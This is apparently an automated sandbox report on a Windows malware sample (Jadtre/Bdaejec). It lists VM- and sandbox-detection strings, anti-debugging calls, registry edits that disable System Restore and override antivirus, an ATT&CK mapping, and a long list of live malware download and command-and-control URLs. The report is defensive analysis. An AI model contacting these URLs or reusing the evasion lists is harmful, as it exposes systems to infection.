Source: XBVdJN.exe, 0000000F.00000002.2796033274.0000000001337000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: Amcache.hve.1.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: UseAutoPlay=1.lnk.vbs.bat.js.scr.com.jse.cmd.pif.jar.dll%ls\%s.lnkautorun.inf_%ls\%s%s\_\%ls.../c rmdir /q /s "%ls"cmd.exe/c move /y "%ls", "%ls"cmd.exerb%hs%temp%%ls\%d%d.exeMozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifierpython.exepythonw.exeprl_cc.exeprl_tools.exevmsrvc.exevmusrvc.exexenservice.exevboxservice.exevboxtray.exevboxcontrol.exevmwareservice.exevmwaretray.exetpautoconnsvc.exevmtoolsd.exevmwareuser.exesbiedll.dllsbiedllx.dlldir_watch.dllwpespy.dllkernel32.dllwine_get_unix_file_namet.u
Source: Amcache.hve.1.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.1.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.1.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: XBVdJN.exe, 0000000F.00000002.2796033274.0000000001337000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}<C
Source: winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: vmwareuser.exe
Source: Amcache.hve.1.dr	Binary or memory string: vmci.sys
Source: XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.1.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.1.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.1.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.1.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.1.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.1.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.1.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: nnsvc.exevmtoolsd.exevmwareuser.exesbiedll.dllsbiedllx.dlldir_watch.dllwpespy.dllkernel32.dllwine_get_unix_file_namet.u
Source: Amcache.hve.1.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.1.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.1.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual RAM
Source: winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: vmsrvc.exe
Source: Amcache.hve.1.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: vboxservice.exe
Source: winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: vmwareservice.exe
Source: Amcache.hve.1.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	API call chain: ExitProcess graph end node	graph_0-13008
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	API call chain: ExitProcess graph end node	graph_1-1029
Source: C:\Windows\94000696690303050\winsvcs.exe	API call chain: ExitProcess graph end node	graph_6-13106
Source: C:\Windows\94000696690303050\winsvcs.exe	API call chain: ExitProcess graph end node	graph_6-13092
Source: C:\Windows\94000696690303050\winsvcs.exe	API call chain: ExitProcess graph end node	graph_6-13093
Source: C:\Windows\94000696690303050\winsvcs.exe	API call chain: ExitProcess graph end node	graph_6-13009

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe

Code function: 0_2_00425036 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_00425036

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe

Code function: 0_2_00425CCD VirtualProtect ?,-00000001,00000104,?

0_2_00425CCD

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Code function: 0_2_00479044 mov eax, dword ptr fs:[00000030h]	0_2_00479044
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Code function: 0_2_02513134 mov eax, dword ptr fs:[00000030h]	0_2_02513134
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Code function: 0_2_02511560 mov eax, dword ptr fs:[00000030h]	0_2_02511560
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 6_2_00479044 mov eax, dword ptr fs:[00000030h]	6_2_00479044
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 6_2_02323134 mov eax, dword ptr fs:[00000030h]	6_2_02323134
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 6_2_02321560 mov eax, dword ptr fs:[00000030h]	6_2_02321560
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 9_2_00479044 mov eax, dword ptr fs:[00000030h]	9_2_00479044
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 9_2_02201560 mov eax, dword ptr fs:[00000030h]	9_2_02201560
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 9_2_02203134 mov eax, dword ptr fs:[00000030h]	9_2_02203134
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 14_2_00479044 mov eax, dword ptr fs:[00000030h]	14_2_00479044
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 14_2_02313134 mov eax, dword ptr fs:[00000030h]	14_2_02313134
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 14_2_02311560 mov eax, dword ptr fs:[00000030h]	14_2_02311560

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe

Code function: 0_2_00423CAD GetProcessHeap,HeapFree,

0_2_00423CAD

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Code function: 0_2_00425036 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00425036
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Code function: 0_2_0042CD04 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0042CD04
Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Code function: 0_2_00426E9B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00426E9B
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 6_2_00425036 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00425036
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 6_2_0042CD04 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_0042CD04
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 6_2_00426E9B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00426E9B
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 9_2_00425036 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_00425036
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 9_2_0042CD04 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_0042CD04
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 9_2_00426E9B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_00426E9B
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 14_2_00425036 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_00425036
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 14_2_0042CD04 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_0042CD04
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: 14_2_00426E9B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_00426E9B

Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\05c412c7.bat" "			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\55fb1e02.bat" "

Source: SciTE.exe.1.dr

Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe

Code function: 0_2_004360A0 cpuid

0_2_004360A0

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe	Code function: GetLocaleInfoA,	0_2_00431AD1
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: GetLocaleInfoA,	6_2_00431AD1
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: GetLocaleInfoA,	9_2_00431AD1
Source: C:\Windows\94000696690303050\winsvcs.exe	Code function: GetLocaleInfoA,	14_2_00431AD1

Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe

Code function: 0_2_0040B517 GetDlgItem,GetClientRect,MoveWindow,InvalidateRect,CreateFontIndirectA,SelectObject,SendMessageA,SetTextColor,MoveToEx,LineTo,MoveToEx,LineTo,MoveToEx,LineTo,MoveToEx,LineTo,CreateSolidBrush,LoadCursorA,LoadIconA,GetModuleHandleA,LoadIconA,CreateWindowExA,GetClientRect,CreateWindowExW,CreateWindowExW,LoadBitmapA,SendMessageA,GetModuleHandleA,LoadBitmapA,LoadImageA,LoadImageA,MoveToEx,LineTo,MoveToEx,LineTo,MoveToEx,LineTo,MoveToEx,LineTo,CreateFontIndirectA,SelectObject,SendMessageA,SetTextColor,MoveToEx,LineTo,MoveToEx,LineTo,MoveToEx,LineTo,MoveToEx,LineTo,CreateSolidBrush,LoadCursorA,LoadIconA,GetModuleHandleA,LoadIconA,CreateWindowExA,GetClientRect,CreateWindowExW,CreateWindowExW,LoadBitmapA,SendMessageA,GetModuleHandleA,LoadBitmapA,LoadImageA,LoadImageA,CreateSolidBrush,LoadCursorA,LoadIconA,GetModuleHandleA,LoadIconA,CreateWindowExA,GetClientRect,CreateWindowExW,CreateWindowExW,LoadBitmapA,SendMessageA,GetModuleHandleA,LoadBitmapA,LoadImageA,LoadImageA,CreateFontIndirectA,SelectObject,SendMessageA,SetTextColor,GetDlgItem,GetClientRect,MoveWindow,InvalidateRect,CreateSolidBrush,LoadCursorA,LoadIconA,GetModuleHandleA,LoadIconA,CreateWindowExA,GetClientRect,CreateWindowExW,CreateWindowExW,LoadBitmapA,SendMessageA,GetModuleHandleA,LoadBitmapA,LoadImageA,LoadImageA,CreateFontIndirectA,SelectObject,SendMessageA,SetTextColor,CreateFontIndirectA,SelectObject,SendMessageA,SetTextColor,MoveToEx,LineTo,MoveToEx,LineTo,MoveToEx,LineTo,MoveToEx,LineTo,GetDlgItem,GetClientRect,MoveWindow,InvalidateRect,MoveToEx,LineTo,MoveToEx,LineTo,MoveToEx,LineTo,MoveToEx,LineTo,CreateSolidBrush,LoadCursorA,LoadIconA,GetModuleHandleA,LoadIconA,CreateWindowExA,GetClientRect,CreateWindowExW,CreateWindowExW,LoadBitmapA,SendMessageA,GetModuleHandleA,LoadBitmapA,LoadImageA,LoadImageA,GetDlgItem,GetClientRect,MoveWindow,InvalidateRect,CreateFontIndirectA,SelectObject,SendMessageA,SetTextColor,GetDlgItem,GetClientRect,MoveWindow,InvalidateRect,CreateFontIndirectA,SelectObject,SendMessageA,SetTextColor,CreateSolidBrush,LoadCursorA,LoadIconA,GetModuleHandleA,LoadIconA,CreateWindowExA,GetClientRect,CreateWindowExW,CreateWindowExW,LoadBitmapA,SendMessageA,GetModuleHandleA,LoadBitmapA,LoadImageA,LoadImageA,CreateFontIndirectA,SelectObject,SendMessageA,SetTextColor,MoveToEx,LineTo,MoveToEx,LineTo,MoveToEx,LineTo,MoveToEx,LineTo,GetDlgItem,GetClientRect,MoveWindow,InvalidateRect,MoveToEx,LineTo,MoveToEx,LineTo,MoveToEx,LineTo,MoveToEx,LineTo,CreateFontIndirectA,SelectObject,SendMessageA,SetTextColor,GetDlgItem,GetClientRect,MoveWindow,InvalidateRect,MoveToEx,LineTo,MoveToEx,LineTo,MoveToEx,LineTo,MoveToEx,LineTo,CreateFontIndirectA,SelectObject,SendMessageA,SetTextColor,CreateFontIndirectA,SelectObject,SendMessageA,SetTextColor,MoveToEx,LineTo,MoveToEx,LineTo,MoveToEx,LineTo,MoveToEx,LineTo,CreateSolidBrush,LoadCursorA,LoadIconA,GetModuleHandleA,LoadIconA,CreateWindowExA,GetClientRect,CreateWindowExW,CreateWindowExW,LoadBitmapA,SendMessageA,GetModuleHandleA,LoadBitmapA

0_2_0040B517

Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exe

Code function: 1_2_0061139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,

1_2_0061139F

Lowering of HIPS / PFW / Operating System Security Settings

Changes security center settings (notifications, updates, antivirus, firewall)

Source: C:\Windows\94000696690303050\winsvcs.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center AntiVirusOverride

Jump to behavior

Disables Windows system restore

Source: C:\Windows\94000696690303050\winsvcs.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore DisableSR

Jump to behavior

Source: XBVdJN.exe, 00000001.00000003.2333120316.00000000011DF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Program Files\Windows Defender\MsMpEng.exe
Source: Amcache.hve.1.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Bdaejec

Source: Yara match	File source: Process Memory Space: XBVdJN.exe PID: 6516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XBVdJN.exe PID: 6256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XBVdJN.exe PID: 3768, type: MEMORYSTR

Remote Access Functionality

Yara detected Bdaejec

Source: Yara match	File source: Process Memory Space: XBVdJN.exe PID: 6516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XBVdJN.exe PID: 6256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XBVdJN.exe PID: 3768, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	1 Replication Through Removable Media	23 Native API	1 Scripting	1 DLL Side-Loading	11 Disable or Modify Tools	11 Input Capture	11 System Time Discovery	1 Taint Shared Content	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 Inhibit System Recovery
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Peripheral Device Discovery	Remote Desktop Protocol	11 Input Capture	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	11 Registry Run Keys / Startup Folder	12 Process Injection	3 Obfuscated Files or Information	Security Account Manager	4 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	11 Registry Run Keys / Startup Folder	22 Software Packing	NTDS	124 System Information Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Query Registry	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	121 Masquerading	Cached Domain Credentials	231 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Virtualization/Sandbox Evasion	DCSync	11 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	3 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Hidden Files and Directories	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
LisectAVT_2403002B_290.exe	100%	Avira	W32/Jadtre.B
LisectAVT_2403002B_290.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\XBVdJN.exe	100%	Avira	TR/Dldr.Small.Z.haljq
C:\Users\user\AppData\Local\Temp\Windows Archive Manager.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Avira	W32/Jadtre.B
C:\Windows\94000696690303050\winsvcs.exe	100%	Avira	W32/Jadtre.B
C:\Program Files\7-Zip\Uninstall.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Avira	W32/Jadtre.B
C:\Users\user\AppData\Local\Temp\XBVdJN.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Windows Archive Manager.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Joe Sandbox ML
C:\Windows\94000696690303050\winsvcs.exe	100%	Joe Sandbox ML
C:\Program Files\7-Zip\Uninstall.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.activestate.comHolger	0%	URL Reputation	safe
http://ddos.dnsnb8.net:799/cj//k3.rar	100%	URL Reputation	malware
http://www.develop.comDeepak	0%	URL Reputation	safe
http://www.activestate.com	0%	URL Reputation	safe
http://www.spaceblue.comMathias	0%	URL Reputation	safe
http://www.lua.org	0%	URL Reputation	safe
http://ddos.dnsnb8.net/	100%	URL Reputation	malware
http://slpsrgpsrhojifdij.biz/tldr.php?newinf=1	100%	Avira URL Cloud	malware
http://fiiauediehduefuge.ru/tldr.php?newinf=1	100%	Avira URL Cloud	malware
https://www.smartsharesystems.com/	0%	URL Reputation	safe
http://www.scintilla.org	0%	URL Reputation	safe
http://www.baanboard.com	0%	URL Reputation	safe
http://ssofhoseuegsgrfnj.su/tldr.php?newinf=1U1	0%	Avira URL Cloud	safe
http://nnososoosjfeuhueu.su/	0%	Avira URL Cloud	safe
http://srndndubsbsifurfd.biz/	100%	Avira URL Cloud	malware
http://afeifieuuufufufuf.net/	100%	Avira URL Cloud	malware
http://slpsrgpsrhojifdij.biz/tldr.php?newinf=1O	100%	Avira URL Cloud	malware
http://eiifngjfksisiufjf.info/	0%	Avira URL Cloud	safe
http://eofihsishihiursgu.su/	100%	Avira URL Cloud	malware
http://eoroooskfogihisrg.in/tldr.php?newinf=1	100%	Avira URL Cloud	malware
http://nousiieiffgogogoo.com/tldr.php?newinf=1	100%	Avira URL Cloud	malware
http://eoroooskfogihisrg.biz/tldr.php?newinf=1K	100%	Avira URL Cloud	malware
http://eiifngjfksisiufjf.com/tldr.php?newinf=1	100%	Avira URL Cloud	malware
http://eoroooskfogihisrg.su/tldr.php?newinf=1	0%	Avira URL Cloud	safe
http://nnososoosjfeuhueu.info/	0%	Avira URL Cloud	safe
http://afeifieuuufufufuf.su/tldr.php?newinf=1fo	0%	Avira URL Cloud	safe
http://ssofhoseuegsgrfnu.ru/http://92.63.197.48/http://slpsrgpsrhojifdij.ru/http://aiiaiafrzrueuedur	0%	Avira URL Cloud	safe
http://eoroooskfogihisrg.su/	0%	Avira URL Cloud	safe
http://fifiehsueuufidhfi.net/tldr.php?newinf=1P	100%	Avira URL Cloud	malware
http://fuaiuebndieufeufu.com/	0%	Avira URL Cloud	safe
http://srndndubsbsifurfd.in/tldr.php?newinf=19h	100%	Avira URL Cloud	malware
http://eoroooskfogihisrg.biz/tldr.php?newinf=1T	100%	Avira URL Cloud	malware
http://aiiaiafrzrueuedur.info/	100%	Avira URL Cloud	malware
http://eiifngjfksisiufjf.com/	100%	Avira URL Cloud	malware
http://srndndubsbsifurfd.ru/tldr.php?newinf=1	100%	Avira URL Cloud	malware
http://fifiehsueuufidhfi.net/	100%	Avira URL Cloud	malware
http://slpsrgpsrhojifdij.com/tldr.php?newinf=1	100%	Avira URL Cloud	malware
http://eoroooskfogihisrg.com/	100%	Avira URL Cloud	malware
http://nousiieiffgogogoo.info/	0%	Avira URL Cloud	safe
http://eoroooskfogihisrg.com/tldr.php?newinf=1w	100%	Avira URL Cloud	malware
http://iuirshriuisruruuf.biz/tldr.php?newinf=1	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k3.rarw	100%	Avira URL Cloud	phishing
http://afeifieuuufufufuf.in/tldr.php?newinf=1	100%	Avira URL Cloud	malware
http://afeifieuuufufufuf.su/tldr.php?newinf=1	0%	Avira URL Cloud	safe
http://nousiieiffgogogoo.su/tldr.php?newinf=1oh	100%	Avira URL Cloud	malware
http://eoroooskfogihisrg.info/	100%	Avira URL Cloud	malware
http://eofihsishihiursgu.ru/	0%	Avira URL Cloud	safe
http://nnososoosjfeuhueu.net/tldr.php?newinf=1e	0%	Avira URL Cloud	safe
http://iuirshriuisruruuf.com/	100%	Avira URL Cloud	malware
http://noeuaoenriusfiruu.in/	100%	Avira URL Cloud	malware
http://fifiehsueuufidhfi.biz/tldr.php?newinf=1.m	0%	Avira URL Cloud	safe
http://srndndubsbsifurfd.biz/tldr.php?newinf=1Gj9	100%	Avira URL Cloud	malware
http://srndndubsbsifurfd.su/http://fiiauediehduefuge.su/http://nousiieiffgogogoo.su/http://fifiehsue	100%	Avira URL Cloud	malware
http://slpsrgpsrhojifdij.biz/	100%	Avira URL Cloud	malware
http://ssofhoseuegsgrfnj.com/	0%	Avira URL Cloud	safe
http://noeuaoenriusfiruu.com/tldr.php?newinf=1L	0%	Avira URL Cloud	safe
http://nousiieiffgogogoo.ru/	100%	Avira URL Cloud	malware
http://eiifngjfksisiufjf.in/	0%	Avira URL Cloud	safe
http://afeifieuuufufufuf.in/	100%	Avira URL Cloud	malware
http://eoroooskfogihisrg.net/tldr.php?newinf=1YA	100%	Avira URL Cloud	malware
http://iuirshriuisruruuf.ru/	100%	Avira URL Cloud	malware
http://fuaiuebndieufeufu.in/tldr.php?newinf=1	100%	Avira URL Cloud	malware
http://eofihsishihiursgu.net/tldr.php?newinf=1wA	0%	Avira URL Cloud	safe
http://eofihsishihiursgu.com/tldr.php?newinf=1	100%	Avira URL Cloud	malware
http://fifiehsueuufidhfi.net/tldr.php?newinf=1	100%	Avira URL Cloud	malware
http://aiiaiafrzrueuedur.in/	100%	Avira URL Cloud	malware
http://eofihsishihiursgu.net/tldr.php?newinf=1n	0%	Avira URL Cloud	safe
http://fifiehsueuufidhfi.com/tldr.php?ne	0%	Avira URL Cloud	safe
http://fiiauediehduefuge.com/tldr.php?newinf=1Ck%	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k3.rar:	100%	Avira URL Cloud	malware
http://eoroooskfogihisrg.in/tldr.php?newinf=15i%	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k1.rark8	100%	Avira URL Cloud	malware
http://afeifieuuufufufuf.info/	0%	Avira URL Cloud	safe
http://srndndubsbsifurfd.net/tldr.php?newinf=1A	100%	Avira URL Cloud	malware
http://aiiaiafrzrueuedur.com/	0%	Avira URL Cloud	safe
http://afeifieuuufufufuf.com/tldr.php?newinf=1jk	0%	Avira URL Cloud	safe
http://afeifieuuufufufuf.ru/tldr.php?newinf=1	0%	Avira URL Cloud	safe
http://eiifngjfksisiufjf.net/tldr.php?newinf=14A	0%	Avira URL Cloud	safe
http://iuirshriuisruruuf.su/tldr.php?newinf=1so	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k4.rarT	100%	Avira URL Cloud	phishing
http://fuaiuebndieufeufu.net/tldr.php?newinf=1	100%	Avira URL Cloud	malware
http://aiiaiafrzrueuedur.com/tldr.php?newinf=1	0%	Avira URL Cloud	safe
http://iuirshriuisruruuf.net/	100%	Avira URL Cloud	malware
http://nnososoosjfeuhueu.in/	0%	Avira URL Cloud	safe
http://srndndubsbsifurfd.su/tldr.php?newinf=1	100%	Avira URL Cloud	malware
http://noeuaoenriusfiruu.net/tldr.php?newinf=1=BZ	100%	Avira URL Cloud	malware
http://aiiaiafrzrueuedur.net/tldr.php?newinf=10B%	0%	Avira URL Cloud	safe
http://nousiieiffgogogoo.su/	100%	Avira URL Cloud	malware
http://fuaiuebndieufeufu.su/tldr.php?newinf=1	100%	Avira URL Cloud	malware
http://fifiehsueuufidhfi.su/	100%	Avira URL Cloud	malware
http://afeifieuuufufufuf.net/tldr.php?newinf=1	100%	Avira URL Cloud	malware
